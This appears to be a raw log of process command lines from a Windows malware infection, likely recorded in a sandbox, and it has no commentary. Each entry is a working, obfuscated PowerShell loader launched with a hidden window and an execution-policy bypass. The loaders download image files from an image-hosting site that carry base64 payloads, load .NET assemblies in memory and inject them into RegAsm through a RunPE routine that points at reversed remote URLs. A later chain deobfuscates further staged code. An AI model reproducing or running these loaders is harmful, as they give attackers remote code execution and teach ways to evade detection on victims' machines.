sDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDkDgTreMwDgTrevDgTreDUDgTreNwDgTre4DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTredgBiDgTreHMDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDcDgTreNgDgTre3DgTreDEDgTreODgTreDgTre0DgTreDQDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDkDgTreMwDgTrevDgTreDUDgTreNwDgTre4DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTredgBiDgTreHMDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDcDgTreNgDgTre3DgTreDEDgTreODgTreDgTre0DgTreDQDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTre7DgTreCDgTreDgTreaQBmDgTreCDgTreDgTreKDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTretDgTreG4DgTreZQDgTregDgTreCQDgTrebgB1DgTreGwDgTrebDgTreDgTrepDgTreCDgTreDgTreewDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFQDgTreZQB4DgTreHQDgTreLgBFDgTreG4DgTreYwBvDgTreGQDgTreaQBuDgTreGcDgTreXQDgTre6DgTreDoDgTreVQBUDgTreEYDgTreODgTreDgTreuDgTreEcDgTreZQB0DgTreFMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCkDgTreOwDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreIDgTreDgTre9DgTreCDgTreDgTreJwDgTre8DgTreDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBTDgTreFQDgTreQQBSDgTreFQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreRgBsDgTreGEDgTreZwDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwDgTrePDgTreBCDgTreEEDgTreUwBFDgTreDYDgTreNDgTreBfDgTreEUDgTreTgBEDgTreD4DgTrePgDgTrenDgTreDsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEkDgTrebgBkDgTreGUDgTreeDgTreBPDgTreGYDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreGkDgTreZgDgTregDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreGUDgTreIDgTreDgTrewDgTreCDgTreDgTreLQBhDgTreG4DgTreZDgTreDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreHQDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreKQDgTregDgTreHsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreC4DgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreOwDgTregDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreDsDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreFMDgTredQBiDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCwDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCkDgTreOwDgTregDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreEMDgTrebwBuDgTreHYDgTreZQByDgTreHQDgTreXQDgTre6DgTreDoDgTreRgByDgTreG8DgTrebQBCDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreQwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreUgBlDgTreGYDgTrebDgTreBlDgTreGMDgTredDgTreBpDgTreG8DgTrebgDgTreuDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQBdDgTreDoDgTreOgBMDgTreG8DgTreYQBkDgTreCgDgTreJDgTreBjDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreLgBHDgTreGUDgTredDgTreBUDgTreHkDgTrecDgTreBlDgTreCgDgTreJwBSDgTreHUDgTrebgBQDgTreEUDgTreLgBIDgTreG8DgTrebQBlDgTreCcDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBtDgTreGUDgTredDgTreBoDgTreG8DgTreZDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreLgBHDgTreGUDgTredDgTreBNDgTreGUDgTredDgTreBoDgTreG8DgTreZDgTreDgTreoDgTreCcDgTreVgBBDgTreEkDgTreJwDgTrepDgTreC4DgTreSQBuDgTreHYDgTrebwBrDgTreGUDgTreKDgTreDgTrekDgTreG4DgTredQBsDgTreGwDgTreLDgTreDgTregDgTreFsDgTrebwBiDgTreGoDgTreZQBjDgTreHQDgTreWwBdDgTreF0DgTreIDgTreDgTreoDgTreCcDgTredDgTreB4DgTreHQDgTreLgBuDgTreHUDgTreagBuDgTreGUDgTrecwBhDgTreC8DgTrebQBvDgTreGMDgTreLgBpDgTreGMDgTreaQByDgTreGEDgTreawBpDgTreGMDgTreZQBrDgTreGUDgTrebDgTreBvDgTreGoDgTreZQBpDgTreHYDgTreLwDgTrevDgTreDoDgTrecwBwDgTreHQDgTredDgTreBoDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwBkDgTreGUDgTrecwBhDgTreHQDgTreaQB2DgTreGEDgTreZDgTreBvDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwBkDgTreGUDgTrecwBhDgTreHQDgTreaQB2DgTreGEDgTreZDgTreBvDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwBkDgTreGUDgTrecwBhDgTreHQDgTreaQB2DgTreGEDgTreZDgTreBvDgTreCcDgTreLDgTreDgTrenDgTreFIDgTreZQBnDgTreEEDgTrecwBtDgTreCcDgTreLDgTreDgTrenDgTreCcDgTreKQDgTrepDgTreH0DgTreIDgTreB9DgTreDgTre==';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = 'ZnVuY3Rpb24gRG93bmxvYWREYXRhRnJvbUxpbmtzIHsgcGFyYW0gKFtzdHJpbmdbXV0kbGlua3MpICR3ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyAkZG93bmxvYWRlZERhdGEgPSBAKCk7ICRzaHVmZmxlZExpbmtzID0gJGxpbmtzIHwgR2V0LVJhbmRvbSAtQ291bnQgJGxpbmtzLkxlbmd0aDsgZm9yZWFjaCAoJGxpbmsgaW4gJHNodWZmbGVkTGlua3MpIHsgdHJ5IHsgJGRvd25sb2FkZWREYXRhICs9ICR3ZWJDbGllbnQuRG93bmxvYWREYXRhKCRsaW5rKSB9IGNhdGNoIHsgY29udGludWUgfSB9OyByZXR1cm4gJGRvd25sb2FkZWREYXRhIH07ICRsaW5rcyA9IEAoJ2h0dHBzOi8vdXBsb2FkZGVpbWFnZW5zLmNvbS5ici9pbWFnZXMvMDA0Lzc5OC8wMTUvb3JpZ2luYWwvbmV3X2ltYWdlLmpwZz8xNzE4Mjg0MjE2JywgJ2h0dHBzOi8vdXBsb2FkZGVpbWFnZW5zLmNvbS5ici9pbWFnZXMvMDA0Lzc5OC8wMTUvb3JpZ2luYWwvbmV3X2ltYWdlLmpwZz8xNzE4Mjg0MjE2Jyk7ICRpbWFnZUJ5dGVzID0gRG93bmxvYWREYXRhRnJvbUxpbmtzICRsaW5rczsgaWYgKCRpbWFnZUJ5dGVzIC1uZSAkbnVsbCkgeyAkaW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoJGltYWdlQnl0ZXMpOyAkc3RhcnRGbGFnID0gJzw8QkFTRTY0X1NUQVJUPj4nOyAkZW5kRmxhZyA9ICc8PEJBU0U2NF9FTkQ+Pic7ICRzdGFydEluZGV4ID0gJGltYWdlVGV4dC5JbmRleE9mKCRzdGFydEZsYWcpOyAkZW5kSW5kZXggPSAkaW1hZ2VUZXh0LkluZGV4T2YoJGVuZEZsYWcpOyBpZiAoJHN0YXJ0SW5kZXggLWdlIDAgLWFuZCAkZW5kSW5kZXggLWd0ICRzdGFydEluZGV4KSB7ICRzdGFydEluZGV4ICs9ICRzdGFydEZsYWcuTGVuZ3RoOyAkYmFzZTY0TGVuZ3RoID0gJGVuZEluZGV4IC0gJHN0YXJ0SW5kZXg7ICRiYXNlNjRDb21tYW5kID0gJGltYWdlVGV4dC5TdWJzdHJpbmcoJHN0YXJ0SW5kZXgsICRiYXNlNjRMZW5ndGgpOyAkY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkYmFzZTY0Q29tbWFuZCk7ICRsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoJGNvbW1hbmRCeXRlcyk7ICR0eXBlID0gJGxvYWRlZEFzc2VtYmx5LkdldFR5cGUoJ1J1blBFLkhvbWUnKTsgJG1ldGhvZCA9ICR0eXBlLkdldE1ldGhvZCgnVkFJJykuSW52b2tlKCRudWxsLCBbb2JqZWN0W11dICgndHh0LndlbnlhbW52aC9sYy5zYXlvanJldmVsYy8vOnNwdHRoJyAsICdkZXNhdGl2YWRvJyAsICdkZXNhdGl2YWRvJyAsICdkZXNhdGl2YWRvJywnUmVnQXNtJywnZGVzYXRpdmFkbycpKX19';$OWjuxd = (New-Object System.Text.UTF8Encoding).GetString([System.Convert]::FromBase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/793/578/original/vbs.jpg?1717671844', 'https://uploaddeimagens.com.br/images/004/793/578/original/vbs.jpg?1717671844'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('RunPE.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.nujnesa/moc.icirakicekelojeiv//:sptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))} }"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/798/015/original/new_image.jpg?1718284216', 'https://uploaddeimagens.com.br/images/004/798/015/original/new_image.jpg?1718284216'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('RunPE.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.wenyamnvh/lc.sayojrevelc//:sptth' , 'desativado' , 'desativado' , 'desativado','RegAsm','desativado'))}}"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Ovaloid = 1;$Pengestrkes='ring';$Mekhitarist198='S';Function Placque($Ansigtsformens){$Bantamweight=$Ansigtsformens.Length-$Ovaloid;$Sowel=$Mekhitarist198+'ubst'+$Pengestrkes;For( $Frizzle=2;$Frizzle -lt $Bantamweight;$Frizzle+=3){$Outgarment+=$Ansigtsformens.$Sowel.Invoke( $Frizzle, $Ovaloid);}$Outgarment;}function Quatrible($Pusheres){ . ($Phenylene) ($Pusheres);}$Extense=Placque 'PhMBroDiz SiBalMalGraDo/ a5 K.Kk0Te ,a(SwW JiChnU,dGeo .wBas t gNNrTM. Ve1 F0D.. U0.o;In CoW riPrnSt6O.4A.;sl U.xR,6 U4Po; . Ar evra:He1Gu2Sp1,o.Ve0Mi)Lo tjGBieSac,uk toPm/ T2 S0 o1Bi0 .0 C1,u0Li1 u .FC iForBue bfUdoMax C/ t1Pi2 C1 t. e0Po ';$Cigartndere=Placque 'CaU As aemerMo-DaApagLaeHan at , ';$Unilaterale=Placque 'A,h,etFit CpBas .: e/ o/ an SzScaHar oi a.a.SpoElrP gOu/ Bs ,xCi/AzO,yvToaSpr iKaoKisF.tNioRemHiyR . HcV sTuvS ';$Forsgscentret=Placque 'Be> P ';$Phenylene=Placque 'S,i ,eM.xGe ';$Passionfruit='Dismes';$synanons = Placque 'Fre ic eh Ho,e r% Paf.pAlpO,d maUdtUdaG %No\H KdydN,fBoaF.rStsT,2N.1Ud1Vi.ExA Pr DbGr Aa& L&Tn TeTrcSth,aoSe FotBa ';Quatrible (Placque 'Ge$pogStl AoAlb .aFolFe:DiNK y Thd.eRudTasChfGooglrKvm SiSudUblN.iIsnT,gW e rNynTaePo=b (S.c,hmNadIm Va/SecPr Ko$.rsJ y,in UaTonAno.rnBus G)F, ');Quatrible (Placque 'Un$.sg.pl no b Rar l n: Af.arBiePse,al Ha nBrcKieS.jBro ru Mrkansta ,lGai ksPrtvie KrRa= U$veUrenBai.il laTot Ae IrBeaGalAred..,tsH pHolPhiSdtBi(S $,aFamoAurVes UgStsboc eGenJatUnr Ae.ytH,) r ');Quatrible (Placque ' T[T.N Uet.tWv.TrSA.eThrTavInilucCoeQuPIno IiH,nCot MCaa enPraRegAfeStr J]N,:Ca:HiSJ,e ,c UuRer,hiByt.ly.oP.arDeoPrtK,o cK.oAklKv .k=,o F[C.NBreEntHa.TsSEde DcU,u arChiBytChyyePLir to,lt.roHacInoColBeTSeySap,xeD,]Ej:In:SoT Rl s.k1Bo2Gr ');$Unilaterale=$freelancejournalister[0];$pneumatocyst= (Placque 'Pa$BagTrlB.oF b ga ,lTe:.eH io .r TmB,oSpgReo ynUna l eTusFr= NH,eN w e- jODobKajUne CcFetP, .yS Uy.fsEmt BeBomM.. LNCle PtB . GWUde abFaC LlSkiBaeLan Kt');$pneumatocyst+=$Nyhedsformidlingerne[1];Quatrible ($pneumatocyst);Quatrible (Placque 'Br$ SHH oA r.rmWeoUtgPuog.n ,aZ lCue Ss,k.KoHGyeSmaBed HeForEksEs[ P$ChC .iHogA,a ur WtP,nCydI.eM,rLiesk]Gr= J$.eEAqx DtcueSinPesEceA ');$Vitriners=Placque '.i$ .HN.o ArAbmSpo,rgA.o MnBeaS,l KeK sSa.MeDTwo ewBen el EoRaa d.eF,oiP lVae .(Ep$HiU .nFoiFulTiaFutC e .r SaD,lSaeG ,Co$t.M aoB,nL.d ungai tKueP tVe),s ';$Mondnitet=$Nyhedsformidlingerne[0];Quatrible (Placque 'St$BagB.lReoAub Ra Sl,l:SkS .yTos it FeGemTyi .sVie HrBi= (A T KeDes ctHo-KvPAlaOrtMeh.n Vo$P M.ooMinakdBln,aiG t,aeLyt.r)Ap ');while (!$Systemiser) {Quatrible (Placque ' O$stgPelShoknb aBel i:CoRw,aUnpCos uo Dd MiSpeKar E=Ud$ Rt srKouHoeUr ') ;Quatrible $Vitriners;Quatrible (Placque 'F,S.ct SaMer.ctP.-.aSA lKoeK,eP,p V Na4di ');Quatrible (Placque 'Th$ hgfalF oUdbb,aP,lAl:FiSSty.hs EtT,e ,m oiQ s JeBerTr=Ri(ErTk,eCosgetPa-KeP.ua.nt MhF. .$NeM aoHenUdd UnFaiCltW,e Ot.r) I ') ;Quatrible (Placque 'Ve$Prg.ulSaoRyb.iaOvlD :AlDBre cvei BmenaTel lt ta Eb Eu.ilP.eCor Ce.anFrdCoe,ys T=.e$h,g .lCooDibFaaRelC,:P.UGrnFod,esCie BeAflCoiUdg FeSi+ N+Fo% $,rflar Me EeDel.eaUnn Ec.de ,j .o .uKlr.lnHoaR.l oi sEctOme.orEf.sucPuoJuuEmnTjtS. ') ;$Unilaterale=$freelancejournalister[$Decimaltabulerendes];}$Stavelsesantallets=321844;$Kopimaskine=26918;Quatrible (Placque '.n$LegKulGro GbRaaBal.a: MSHrk uM,lOvdS,e ,rKosWat,irTroH,ps Mo=Va HuGdeebytSi-.rC,eo ,n,et.beRanu.t r$B.MKyoSanAkdErnaniPat,oe ,t R ');Quatrible (Placque ' .$Blglel,uoDrbHya,pl .:SgTMei ClBehBroF e Vr,xeHi S,=St F [.iS iys.s et ,eMamVu. SCMeo .n AvEne .rUntu ]Co:Gr:FoF,irFuo m PBekaU sBeeMi6La4T.SFotF,r.niWen NgCy( t$PaSBikSnu,flQ.dHyeS rHesuntGrrSpoFepPr) c ');Quatrible (Placque ' y$AfgArlOmoStb.oaM l S:NeB aeQus at,ri FaStlC,sFl1fr0Bu5Ti Pa= kv[OmSSlyPhs BtAce,am a.FeT .eA.x Rt A.PlEBanEncOvo ,dR.i knSkgPi]Sp:Pa:T A RSS,C LI LII..EnGReeFotj.SovtvirPyi,enfagAk(Pe$ TTDyi lK,hTao FeT rCoeP ) ');Quatrible (Placque 'Me$BagaalF.oFobOcaSllGe:W KFlaDubVaeTalP lCogHjnC,i enDeg.a= R$ uBkre CsPot SiS,aGolRusKo1Te0S,5 P. ns SuRobD s ,t.er,xi SnKig (J.$B,S RtgaaArv,peB l,tsFlerasG a.en,rtInaJ.lRelToe,itArsP,,Ci$ImKNeoCepAbibam.maB,sVakEfi yn,keFo)Ep ');Quatrible $Kabellgning;"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Kdfars211.Arb && echo t"

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Ovaloid = 1;$Pengestrkes='ring';$Mekhitarist198='S';Function Placque($Ansigtsformens){$Bantamweight=$Ansigtsformens.Length-$Ovaloid;$Sowel=$Mekhitarist198+'ubst'+$Pengestrkes;For( $Frizzle=2;$Frizzle -lt $Bantamweight;$Frizzle+=3){$Outgarment+=$Ansigtsformens.$Sowel.Invoke( $Frizzle, $Ovaloid);}$Outgarment;}function Quatrible($Pusheres){ . ($Phenylene) ($Pusheres);}$Extense=Placque 'PhMBroDiz SiBalMalGraDo/ a5 K.Kk0Te ,a(SwW JiChnU,dGeo .wBas t gNNrTM. Ve1 F0D.. U0.o;In CoW riPrnSt6O.4A.;sl U.xR,6 U4Po; . Ar evra:He1Gu2Sp1,o.Ve0Mi)Lo tjGBieSac,uk toPm/ T2 S0 o1Bi0 .0 C1,u0Li1 u .FC iForBue bfUdoMax C/ t1Pi2 C1 t. e0Po ';$Cigartndere=Placque 'CaU As aemerMo-DaApagLaeHan at , ';$Unilaterale=Placque 'A,h,etFit CpBas .: e/ o/ an SzScaHar oi a.a.SpoElrP gOu/ Bs ,xCi/AzO,yvToaSpr iKaoKisF.tNioRemHiyR . HcV sTuvS ';$Forsgscentret=Placque 'Be> P ';$Phenylene=Placque 'S,i ,eM.xGe ';$Passionfruit='Dismes';$synanons = Placque 'Fre ic eh Ho,e r% Paf.pAlpO,d maUdtUdaG %No\H KdydN,fBoaF.rStsT,2N.1Ud1Vi.ExA Pr DbGr Aa& L&Tn TeTrcSth,aoSe FotBa ';Quatrible (Placque 'Ge$pogStl AoAlb .aFolFe:DiNK y Thd.eRudTasChfGooglrKvm SiSudUblN.iIsnT,gW e rNynTaePo=b (S.c,hmNadIm Va/SecPr Ko$.rsJ y,in UaTonAno.rnBus G)F, ');Quatrible (Placque 'Un$.sg.pl no b Rar l n: Af.arBiePse,al Ha nBrcKieS.jBro ru Mrkansta ,lGai ksPrtvie KrRa= U$veUrenBai.il laTot Ae IrBeaGalAred..,tsH pHolPhiSdtBi(S $,aFamoAurVes UgStsboc eGenJatUnr Ae.ytH,) r ');Quatrible (Placque ' T[T.N Uet.tWv.TrSA.eThrTavInilucCoeQuPIno IiH,nCot MCaa enPraRegAfeStr J]N,:Ca:HiSJ,e ,c UuRer,hiByt.ly.oP.arDeoPrtK,o cK.oAklKv .k=,o F[C.NBreEntHa.TsSEde DcU,u arChiBytChyyePLir to,lt.roHacInoColBeTSeySap,xeD,]Ej:In:SoT Rl s.k1Bo2Gr ');$Unilaterale=$freelancejournalister[0];$pneumatocyst= (Placque 'Pa$BagTrlB.oF b ga ,lTe:.eH io .r TmB,oSpgReo ynUna l eTusFr= NH,eN w e- jODobKajUne CcFetP, .yS Uy.fsEmt BeBomM.. LNCle PtB . GWUde abFaC LlSkiBaeLan Kt');$pneumatocyst+=$Nyhedsformidlingerne[1];Quatrible ($pneumatocyst);Quatrible (Placque 'Br$ SHH oA r.rmWeoUtgPuog.n ,aZ lCue Ss,k.KoHGyeSmaBed HeForEksEs[ P$ChC .iHogA,a ur WtP,nCydI.eM,rLiesk]Gr= J$.eEAqx DtcueSinPesEceA ');$Vitriners=Placque '.i$ .HN.o ArAbmSpo,rgA.o MnBeaS,l KeK sSa.MeDTwo ewBen 